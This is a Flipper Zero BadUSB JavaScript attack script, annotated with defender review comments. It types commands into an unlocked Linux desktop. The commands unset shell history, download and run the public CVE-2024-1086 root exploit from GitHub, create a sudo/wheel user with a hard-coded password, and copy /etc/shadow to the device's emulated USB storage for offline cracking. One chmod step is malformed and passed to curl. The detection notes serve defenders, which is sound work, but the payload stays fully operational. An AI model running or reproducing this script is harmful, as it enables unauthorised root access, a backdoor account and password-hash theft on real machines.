//
// __ ______ ______ ______ __ __ __
// /\ \ /\ ___\ /\__ _\ /\ == \ /\ \ /\ \/ /
// _\_\ \ \ \ __\ \/_/\ \/ \ \ __< \ \ \____ \ \ _"-.
// /\_____\ \ \_____\ \ \_\ \ \_____\ \ \_____\ \ \_\ \_\
// \/_____/ \/_____/ \/_/ \/_____/ \/_____/ \/_/\/_/
//
//
// CVE-2024-1086 exploit, sudo user creation, and exfil /etc/shadow to F0 USB Mass Storage
// Version 1.0
//
// Author: JetBlk (https://github.com/jetblk || https://discord.com/users/415611606408364062/)
//
// CVE-2024-1086 is a universal local privilege escalation Proof-of-Concept exploit.
// More info here: https://github.com/Notselwyn/CVE-2024-1086
//
// This JavaScript payload builds upon the CVE-2024-1086 BadUSB script to take things a step further.
// Phase 1: The exploit has gained elevated privileges
// Phase 2: Adds a new sudo user (line 73, configure the username and password on lines 54-55), then exfils /etc/shadow to usb mass storage for offline cracking.
//
let badusb = require("badusb");
let usbdisk = require("usbdisk");
let storage = require("storage");
let dialog = require("dialog");
// ************
// IMPORTANT: Be sure this matches your computer keyboard layout!!!
// See /ext/badusb/assets/layouts/ for list of supported keyboard layouts.
// The value is spliced into the layout_path handed to badusb.setup() further down
// ("/ext/badusb/assets/layouts/" + layout + ".kl"), so it selects the keymap file
// used for the emulated keyboard.
let layout = "en-US";
// ************
// Executes BadUSB commands with the ability to print to the F0 screen as the script executes, then have an optional delay.
//
// 'command' is required, 'message' and 'delay' are optional
function sendToConsole(script)
{
    // Plays a list of steps in order. Each step is an object with a required
    // 'command' and optional 'message' / 'delay' fields.
    //
    // For every step: show 'message' on the F0 screen when it is set, send
    // 'command' through badusb.println(), then pause for 'delay' when it is set.
    // Nothing is read back from the host, so a step that fails there does not
    // stop the steps after it from being sent.
    let idx = 0;
    while (idx < script.length) {
        let step = script[idx];
        if (step.message) {
            print(step.message); // F0 screen message
        }
        badusb.println(step.command); // BadUSB command to execute
        if (step.delay) {
            delay(step.delay); // fixed pause; a falsy delay (missing or 0) skips it
        }
        idx++;
    }
}
// ************
// Storage definition for data exfil
// imageName is reused in the secondary script as part of the host-side device id
// it waits for (usb-Flipper_Mass_Storage_<imageName>-0:0), so the name is a usable
// indicator when reviewing udev / kernel logs on a suspected host.
let imageName = "PHUN";
// Path handed to storage.exists(), usbdisk.createImage() and usbdisk.start() below.
let image = "/ext/apps_data/mass_storage/" + imageName + ".img";
// Second argument of usbdisk.createImage(); presumably a byte count (8 MiB) - TODO confirm.
let size = 8 * 1024 * 1024;
// ************
// Define your new sudo user
// NOTE(review): both values are hard-coded in a published script and are concatenated
// into the useradd command line in the secondary script. Unless they were edited,
// any host where that step succeeded carries the same account name, which makes
// "skid" a cheap string to search for in /etc/passwd, /etc/group and auth logs
// during triage.
let suUser = "skid";
let suPassword = "Sup3rDup3rPW1!";
// ************
// Primary Script Definition - CVE-2024-1086 exploit
//
// 'command' is required, 'message' and 'delay' are optional
//
// Each entry is sent verbatim by sendToConsole(); nothing here checks whether a
// step succeeded on the host before the next one is sent.
//
// Defender notes (review): the host-side artefacts of this phase are a shell whose
// history variables were unset, outbound curl requests to a GitHub release URL,
// and execution of ./exploit from the shell's working directory. The durable
// fix is the vendor kernel update for CVE-2024-1086; egress filtering and
// exec auditing (auditd / EDR on execve) cover the window before patching.
let primary = [
{ command: "unset HISTFILE SAVEHIST PROMPT_COMMAND", delay: 100 },
{ message: "Downloading payload...", command: "curl -L -O https://github.com/Notselwyn/CVE-2024-1086/releases/download/v1.0.0/exploit", delay: 10 },
{ command: "curl -L -O chmod +x exploit", delay: 10 },
{ message: "Executing payload...", command: "./exploit", delay: 5000 },
];
// ************
// Secondary Script Definition - sudo user creation and exfil
//
// 'command' is required, 'message' and 'delay' are optional
//
// Sent after the primary script. The first entry runs useradd with the configured
// name and password concatenated into the command line. The remaining entries are
// the pieces of one `bash -c '...'` string, which the last entry closes and
// backgrounds with `&disown` before `exit`.
// Inside that string: wait until the Flipper mass-storage partition exists as a
// block device, mount it on a mktemp directory, copy /etc/shadow onto it under a
// date/time-stamped name, then sync, unmount, eject and delete the mount point.
//
// Defender notes (review):
//  - Account creation: audit useradd/usermod executions and writes to /etc/passwd,
//    /etc/shadow and /etc/group; alert on new members of the sudo / wheel groups.
//  - The password is part of the typed command line, so it can surface in execve
//    audit records and in terminal scrollback captured during response.
//  - Removable media: the device-id prefix usb-Flipper_Mass_Storage_ under
//    /dev/disk/by-id/ and the matching udev / kernel log lines mark the exfil
//    channel. USB device authorisation (for example USBGuard) can refuse both
//    the keyboard and the storage interface before any of this runs.
//  - Once this has run, treat every hash in /etc/shadow as exposed and rotate
//    the affected passwords.
let secondary = [
{ message: "Adding new sudo user...", command: "useradd -G sudo,wheel "+suUser+" -p "+suPassword+";", delay: 500 },
{ message: "USB Mount and exfil...", command: "bash -c '", delay: 10 },
{ command: "img=" + imageName + ";", delay: 10 },
{ command: "disk=/dev/disk/by-id/usb-Flipper_Mass_Storage_$img-0:0;", delay: 10 },
{ command: "part=$disk-part1;", delay: 10 },
{ command: "while [ ! -b $part ];do sleep 1;done;", delay: 10 },
{ command: "mnt=$(mktemp -d);", delay: 10 },
{ command: "date=$(date +%Y-%m-%d);", delay: 10 }, // Current Date in YYYY-MM-DD format - see below
{ command: "time=$(date +%s);", delay: 10 }, // Current timestamp - Use the combination of $date and $time to create unique folders/files
{ command: "sudo mount $part $mnt;", delay: 10 },
{ command: "cat /etc/shadow > $mnt/shadow_$date-$time.cp;", delay: 10 }, // exfil whatever you want
{ command: "sync $mnt;", delay: 10 },
{ command: "sudo umount $part", delay: 10 },
{ command: "sudo eject $disk;", delay: 10 },
{ command: "rm -rf $mnt", delay: 10 },
{ command: "'&disown;exit", delay: 10 },
];
// ************
// Get storage ready
// Reuses the image file if it already exists, otherwise creates one of `size`.
print("Checking for Image...");
if (storage.exists(image)) {
print ("Storage Exists.");
}
else {
print ("Creating Storage...");
usbdisk.createImage(image, size);
}
// ************
// Setup BadUSB connection
// vid / pid / mfr_name / prod_name are the identity values requested for the emulated
// keyboard - presumably what the host sees at enumeration (TODO confirm against the
// firmware docs).
// NOTE(review): these values are chosen by whoever edits the script, so matching on
// this VID/PID or on the "Flipper" / "Zero" strings only catches unmodified copies.
// Policies that require explicit approval of any newly attached HID device do not
// depend on them.
badusb.setup({ vid: 0xAAAA, pid: 0xBBBB, mfr_name: "Flipper", prod_name: "Zero", layout_path: "/ext/badusb/assets/layouts/" + layout + ".kl" });
print("Waiting for connection");
// Poll once per second until the BadUSB module reports a connection.
while (!badusb.isConnected()) {
delay(1000);
}
// ************
// Show a dialog to pause execution until ready
dialog.message("Payload for CVE-2024-1086", "Press OK to start");
// ************
// Open Terminal
// Sends the CTRL+ALT+t key combination and then waits a fixed 500 before typing.
// NOTE(review): this needs an unlocked desktop session that maps the shortcut to a
// terminal, so locking unattended machines is a direct mitigation.
badusb.press("CTRL", "ALT", "t");
delay(500);
// ************
// Execute Primary Script
print("Phase 1: Downloading payload for CVE-2024-1086 and executing...");
sendToConsole(primary);
// The "complete" messages below only mean the steps were sent; nothing verifies the
// outcome on the host.
print("Phase 1 complete.");
delay(500);
// ************
// Execute Secondary Script (Exfil)
print("Phase 2: Adding a new sudo user and exfil /etc/shadow to USB...");
sendToConsole(secondary);
print("Phase 2 complete.");
delay(500);
// ************
// Detach Keyboard
badusb.quit();
// ************
// Wait for typing to finish and attach storage, eject and finish
// After the keyboard is released, the image is presented through usbdisk.start(); the
// loop then polls once per second until usbdisk reports that it was ejected.
// NOTE(review): on the host this shows up as a keyboard disappearing and a mass-storage
// device appearing about two seconds later, a sequence worth correlating in
// USB event logs.
delay(2000);
usbdisk.start(image);
print("Please wait until the terminal closes to eject.");
while (!usbdisk.wasEjected()) {
delay(1000);
}
usbdisk.stop();
print("Script Complete.");